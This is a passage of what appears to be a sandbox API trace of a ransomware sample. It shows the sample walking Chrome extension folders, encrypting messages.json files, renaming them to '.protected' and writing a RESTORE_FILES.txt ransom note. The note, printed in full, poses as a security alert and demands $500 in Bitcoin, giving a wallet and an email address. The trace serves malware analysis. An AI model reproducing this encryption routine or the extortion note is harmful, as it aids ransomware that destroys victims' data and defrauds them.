(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.111] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.111] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.111] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.111] CloseHandle (hObject=0x164) returned 1 [0081.111] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.111] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt") returned 145 [0081.112] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0081.112] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*") returned 147 [0081.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\.") returned 147 [0081.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\..") returned 148 [0081.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.112] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.113] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.113] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.113] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2ae, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.114] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2ae, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.114] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.115] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.115] CloseHandle (hObject=0x168) returned 1 [0081.115] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected") returned 169 [0081.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected")) returned 1 [0081.115] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.115] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\RESTORE_FILES.txt") returned 163 [0081.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.116] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.116] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.117] CloseHandle (hObject=0x164) returned 1 [0081.117] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned 145 [0081.117] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0081.117] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*") returned 147 [0081.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.117] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\.") returned 147 [0081.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\..") returned 148 [0081.118] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.118] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.118] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.118] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.118] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.118] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.118] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.118] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.121] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2bb, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2bb, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.122] CloseHandle (hObject=0x168) returned 1 [0081.122] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected") returned 169 [0081.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.protected")) returned 1 [0081.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.123] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\RESTORE_FILES.txt") returned 163 [0081.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.123] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.123] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.124] lstrlenA 